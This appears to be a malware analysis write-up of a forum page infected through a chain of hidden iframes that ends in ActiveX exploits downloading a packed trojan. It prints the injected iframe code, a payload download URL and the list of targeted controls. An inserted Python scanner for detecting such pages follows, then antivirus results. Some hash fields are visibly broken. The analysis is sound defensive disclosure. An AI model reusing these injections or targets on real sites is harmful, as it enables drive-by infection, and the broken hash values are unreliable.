A forum is infected with Worm.Win32.AutoRun.eyh

Source: Internet
Author: User
Tags: crypt

The forum page contains the following code:
/---
<IFRAME width='0' height='0' src='hxxp://www.5**4*z**c.cn/1*%7aq/q.js'></iframe>
---/

hxxp://www.5**4*z**c.cn/1*%7aq/q.js
Output code:
/---
<IFRAME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></iframe>
---/

hxxp://m**.sf*s3**wws.cn/03/x4.htm
Code included:
/---
<IFRAME src=google.htm width=100 height=0></iframe>
---/

hxxp://m**.sf*s3**wws.cn/03/google.htm
A previously unseen obfuscation ("encryption") scheme is used. The first part of the code is:
/---
<HTML>
---/

Its function is to detect the browser: if it is Internet Explorer, ie.swf is loaded; otherwise ff.swf is loaded. The code then outputs:
/---
<IFRAME src=all.htm width=100 height=0></iframe>
---/

hxxp://m**.sf*s3**wws.cn/03/all.htm

The same obfuscation scheme is used here. The page uses <IFRAME> to load the following pages, each of which exploits a vulnerability to download hxxp://d1.csygg.com/01/g.exe:

1.htm: exploits the MS06-014 vulnerability

kdosn.htm: exploits the QvodPlayer (CLSID: F3D0D36F-23F8-4682-A195-74C92B03D4AF) vulnerability

kc.htm: exploits the Baidu Toolbar (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) vulnerability to download hxxp://d1.csygg.com/01/baidu.cab

newlz.htm: exploits the Lizing (GLIEDown.IEDown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8) vulnerability

s.htm: exploits the Sina (Downloader.DLoader.1, CLSID: 78abdc59-d8e7-44d3-9a76-9a0918c52b4a) vulnerability

office.htm: exploits the MS Office Snapshot Viewer (snpvw.Snapshot Viewer Control.1) vulnerability

bf.htm: exploits the Storm Player (MPS.StormPlayer) vulnerability

cx.htm: exploits the SuperStar Reader (pdg2) vulnerability

uu.htm: exploits the UUSee Network TV (UUUPGRADE.UUUpgradeCtrl.1) vulnerability

2.htm: exploits the HanGamePluginCn18.HanGamePluginCn18.1 vulnerability

3.htm, 4.htm: exploit the RealPlayer (IERPCtl.IERPCtl.1) vulnerability

0.htm: exploits the control with CLSID 19effc12-25fb-479a-a0f2-1569ae1b3365

5.htm: exploits the MS09-002 vulnerability
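The chain above is found by following iframes that are sized so they never render, ending in pages that instantiate specific ActiveX controls. The scanner below is an added example, not code from the post: it walks an HTML document with Python's html.parser, reports iframes with a zero or one-pixel dimension, and reports object tags whose classid matches one of the CLSIDs listed above. The CLSID-to-name map, the host names and the sample page are constructed for the example.

```python
from html.parser import HTMLParser

# CLSIDs named in the page list above, mapped to the control they belong to.
# The labels are the post's own names; the map itself is constructed here.
FLAGGED_CLSIDS = {
    "F3D0D36F-23F8-4682-A195-74C92B03D4AF": "QvodPlayer",
    "A7F05EE4-0426-454F-8013-C41E3596E9E9": "Baidu Toolbar",
    "F917534D-535B-416B-8E8F-0C04756C31A8": "GLIEDown.IEDown.1",
    "78ABDC59-D8E7-44D3-9A76-9A0918C52B4A": "Downloader.DLoader.1",
    "19EFFC12-25FB-479A-A0F2-1569AE1B3365": "control used by 0.htm",
}

def _size(value):
    """Turn a width/height attribute ('0', '100px') into an int; None if absent."""
    if value is None:
        return None
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None

class DriveByScanner(HTMLParser):
    """Collect (kind, detail) findings while html.parser walks the page."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}   # html.parser already unquotes values
        if tag == "iframe":
            w, h = _size(a.get("width")), _size(a.get("height"))
            # width/height of 0 or 1 px: the frame is loaded but never meant to be seen
            if (w is not None and w <= 1) or (h is not None and h <= 1):
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "object":
            clsid = (a.get("classid") or "").upper().replace("CLSID:", "").strip("{}")
            if clsid in FLAGGED_CLSIDS:
                self.findings.append(("vulnerable_activex", FLAGGED_CLSIDS[clsid]))

def scan_html(html):
    """Return the list of findings for one HTML document."""
    parser = DriveByScanner()
    parser.feed(html)
    return parser.findings

# Constructed sample modelled on the snippets in the post; hosts are placeholders.
SAMPLE = """<html><body>
<IFRAME width = '0' Height = '0' src = 'hxxp://redirector.invalid/1/q.js'> </iframe>
<IFRAME src=google.htm width = 100 Height = 0> </iframe>
<iframe src=video.htm width=640 height=480></iframe>
<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF"></object>
</body></html>"""
```

Calling scan_html(SAMPLE) returns the two hidden frames and the QvodPlayer object; the 640x480 frame is not reported.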

File: D:/test/g.exe
Attributes: ---
Digital signature: no
PE file: yes
An error occurred while obtaining the file version information!
Creation time: 22:38:20
Modification time: 22:38:20
Size: 25696 bytes, 25.96 KB
MD5: cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
CRC32: 3ee9304b


| Antivirus engine | Version | Last update | Scan result |
|---|---|---|---|
| A-squared | 4.0.0.101 | 2009.03.23 | Win32.Warezov!IK |
| AhnLab-V3 | 5.0.0.2 | 2009.03.23 | Packed/Upack |
| AntiVir | 7.9.0.120 | 2009.03.23 | TR/Crypt.UPKM.Gen |
| Authentium | 5.1.2.4 | 2009.03.23 | W32/Systroj.N.gen!Eldorado |
| Avast | 4.8.1335.0 | 2009.03.23 | - |
| AVG | 8.5.0.283 | 2009.03.23 | Rootkit-Agent.BN |
| BitDefender | 7.2 | 2009.03.23 | Generic.Malware.SP!BPK!TKG.be60b47d |
| CAT-QuickHeal | 10.00 | 2009.03.23 | - |
| ClamAV | 0.94.1 | 2009.03.23 | Worm.Mytob-73 |
| Comodo | 1082 | 2009.03.23 | - |
| DrWeb | 4.44.0.09170 | 2009.03.23 | DLOADER.Trojan |
| eSafe | 7.0.20. | 2009.03.23 | Win32.Looked.gen |
| eTrust-Vet | 31.6.6412 | 2009.03.23 | - |
| F-Prot | 4.4.4.56 | 2009.03.23 | W32/Systroj.N.gen!Eldorado |
| F-Secure | 8.0.14470.0 | 2009.03.23 | Trojan.Win32.Agent2.gcy |
| Fortinet | 3.117.0.0 | 2009.03.23 | - |
| GData | 19 | 2009.03.23 | Generic.Malware.SP!BPK!TKG.be60b47d |
| Ikarus | T3.1.1.48.0 | 2009.03.23 | Win32.Warezov |
| K7AntiVirus | 7.10.678 | 2009.03.21 | Generic.Packed.Upack-1 |
| Kaspersky | 7.0.0.125 | 2009.03.23 | Trojan.Win32.Agent2.gcy |
| McAfee | 5561 | 2009.03.22 | - |
| McAfee+Artemis | 5561 | 2009.03.22 | New Malware.f |
| McAfee-GW-Edition | 6.7.6 | 2009.03.23 | Trojan.Crypt.UPKM.Gen |
| Microsoft | 1.4502 | 2009.03.23 | - |
| NOD32 | 3953 | 2009.03.21 | - |
| Norman | 6.00.06 | 2009.03.23 | W32/Suspicious_U.gen |
| nProtect | 2009.1.8.0 | 2009.03.23 | - |
| Panda | 10.0.0.10 | 2009.03.22 | - |
| PCTools | 4.4.2.0 | 2009.03.23 | Packed/Upack |
| Prevx1 | V2 | 2009.03.23 | High Risk Worm |
| Rising | 21.22.02.00 | 2009.03.23 | Worm.Win32.AutoRun.eyh |
| Sophos | 4.39.0 | 2009.03.23 | Mal/Packer |
| Sunbelt | 3.2.1858.2 | 2009.03.22 | - |
| Symantec | 1.4.4.12 | 2009.03.23 | Trojan.KillAV |
| TheHacker | 6.3.3.4.287 | 2009.03.23 | - |
| TrendMicro | 8.700.0.1004 | 2009.03.23 | CRYP_UPACK |
| VBA32 | 3.12.10.1 | 2009.03.23 | - |
| ViRobot | 2009.3.23.1660 | 2009.03.23 | - |
| VirusBuster | 4.6.5.0 | 2009.03.22 | Packed/Upack |
Additional information
File size: 25696 bytes
MD5: cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
SHA256: sha256
SHA512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca54259bb970550
ssdeep: 384:b5jocon1ffccinu9mg1_hy+qvmf6mfjt6unhqjnx8cw02igc8telalvr7l:B4co7ykjvxfjc7n2igptelavr
PEiD: Upack 0.24-0.27 beta / 0.28 alpha -> Dwing
TrID: file type identification: DOS Executable Generic (100.0%)
PEInfo: PE structure information
  (base data)
  entrypointaddress: 0x1efe3
  timedatestamp: 0x0 (Thu Jan 01 00:00:00 1970)
  machinetype: 0x14c (i386)
  (2 sections)
  name    viradd   virsiz   rawdsiz  ntrpy  MD5
  .Upack  0x1000   0x18000  0x0      0.00   d41d8cd98f00b204e9800998ecf8427e
  .rsrc   0x19000  0xe000   0x6260   7.98   88e69c0ef43413739c008ef9e7337308
  (1 imports)
  > kernel32.dll: LoadLibraryA, GetProcAddress
  (0 exports)
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=2480bffb6039ec60640200dbb987a400c935bb45
Packers (Kaspersky): Upack
Packers (Authentium): embedded
Packers (F-Prot): embedded
